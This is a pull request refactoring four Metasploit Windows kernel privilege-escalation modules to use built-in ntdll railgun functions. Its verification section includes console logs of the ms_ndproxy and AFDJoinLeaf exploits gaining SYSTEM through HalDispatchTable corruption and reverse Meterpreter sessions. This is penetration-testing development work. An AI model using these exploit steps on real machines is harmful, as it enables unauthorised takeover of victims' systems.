### PR TITLE
Use new ntdll railgun functions

### DIFF
--- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
+++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
@@ -172,19 +172,6 @@ class Metasploit3 < Msf::Exploit::Local
     irpstuff << rand_text_alpha(231)
 
     if not this_proc.memory.writable?(0x1000)
-      session.railgun.add_function(
-        'ntdll',
-        'NtAllocateVirtualMemory',
-        'DWORD',
-        [
-          ["DWORD", "ProcessHandle", "in"],
-          ["PBLOB", "BaseAddress", "inout"],
-          ["PDWORD", "ZeroBits", "in"],
-          ["PBLOB", "RegionSize", "inout"],
-          ["DWORD", "AllocationType", "in"],
-          ["DWORD", "Protect", "in"]
-        ])
-
       result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
     end
     if not this_proc.memory.writable?(0x1000)
@@ -260,31 +247,6 @@ class Metasploit3 < Msf::Exploit::Local
       print_error("The socket is not in the correct state")
       return
     end
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ]
-      ])
 
     print_status("Triggering AFDJoinLeaf pointer overwrite...")
     result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -87,44 +87,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def add_railgun_functions
-    session.railgun.add_function(
-      'ntdll',
-      'NtAllocateVirtualMemory',
-      'DWORD',
-      [
-        ["DWORD", "ProcessHandle", "in"],
-        ["PBLOB", "BaseAddress", "inout"],
-        ["PDWORD", "ZeroBits", "in"],
-        ["PBLOB", "RegionSize", "inout"],
-        ["DWORD", "AllocationType", "in"],
-        ["DWORD", "Protect", "in"]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ],
-        [ "PDWORD", "Interval", "out" ]
-      ])
     session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',

--- a/modules/exploits/windows/local/novell_client_nicm.rb
+++ b/modules/exploits/windows/local/novell_client_nicm.rb
@@ -67,44 +67,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def add_railgun_functions
-    session.railgun.add_function(
-      'ntdll',
-      'NtAllocateVirtualMemory',
-      'DWORD',
-      [
-        ["DWORD", "ProcessHandle", "in"],
-        ["PBLOB", "BaseAddress", "inout"],
-        ["PDWORD", "ZeroBits", "in"],
-        ["PBLOB", "RegionSize", "inout"],
-        ["DWORD", "AllocationType", "in"],
-        ["DWORD", "Protect", "in"]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ],
-        [ "PDWORD", "Interval", "out" ]
-      ])
     session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',

--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -63,44 +63,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def add_railgun_functions
-    session.railgun.add_function(
-      'ntdll',
-      'NtAllocateVirtualMemory',
-      'DWORD',
-      [
-        ["DWORD", "ProcessHandle", "in"],
-        ["PBLOB", "BaseAddress", "inout"],
-        ["PDWORD", "ZeroBits", "in"],
-        ["PBLOB", "RegionSize", "inout"],
-        ["DWORD", "AllocationType", "in"],
-        ["DWORD", "Protect", "in"]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtDeviceIoControlFile',
-      'DWORD',
-      [
-        [ "DWORD", "FileHandle", "in" ],
-        [ "DWORD", "Event", "in" ],
-        [ "DWORD", "ApcRoutine", "in" ],
-        [ "DWORD", "ApcContext", "in" ],
-        [ "PDWORD", "IoStatusBlock", "out" ],
-        [ "DWORD", "IoControlCode", "in" ],
-        [ "LPVOID", "InputBuffer", "in" ],
-        [ "DWORD", "InputBufferLength", "in" ],
-        [ "LPVOID", "OutputBuffer", "in" ],
-        [ "DWORD", "OutPutBufferLength", "in" ]
-      ])
-
-    session.railgun.add_function(
-      'ntdll',
-      'NtQueryIntervalProfile',
-      'DWORD',
-      [
-        [ "DWORD", "ProfileSource", "in" ],
-        [ "PDWORD", "Interval", "out" ]
-      ])
     session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',


### PR DESCRIPTION
Short history, @zeroSteiner added some functions to railgun, from ntdll, here: #2758

So has no sense which some modules still try to add them by themselves.
# Verification
- [ ] Get a session on any vulnerable machine to any of the modified exploits.
- [ ] Run the module on the session
- [ ] You should be enjoying a new SYSTEM session.

Verification is attached for ms11_080_afdjoinleaf and ms_ndproxy
- ms_ndproxy

```
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[*] Injecting 290 bytes into 3804 memory and executing it...
[*] Sending stage (769024 bytes) to 192.168.172.244
[+] Enjoy
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1045) at 2013-12-13 16:04:04 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

```
- ms11_080_afdjoinleaf

```
msf exploit(ms11_080_afdjoinleaf) > set session 3
session => 3
msf exploit(ms11_080_afdjoinleaf) > exploit

[*] Started reverse handler on 10.6.0.165:4444 
[*] Running against Windows XP SP2 / SP3
[*] Kernel Base Address: 0x804d7000
[*] HalDisPatchTable Address: 0x80545838
[*] HaliQuerySystemInformation Address: 0x806e6bba
[*] HalpSetSystemInformation Address: 0x806e9436
[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: Died

[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Injecting the payload into SYSTEM process: winlogon.exe PID: 636
[*] Writing 290 bytes at address 0x00a30000
[*] Sending stage (769024 bytes) to 10.6.0.165
[*] Restoring the original token...
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:57280) at 2013-12-13 16:05:42 -0600

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 4 closed.  Reason: User exit
```
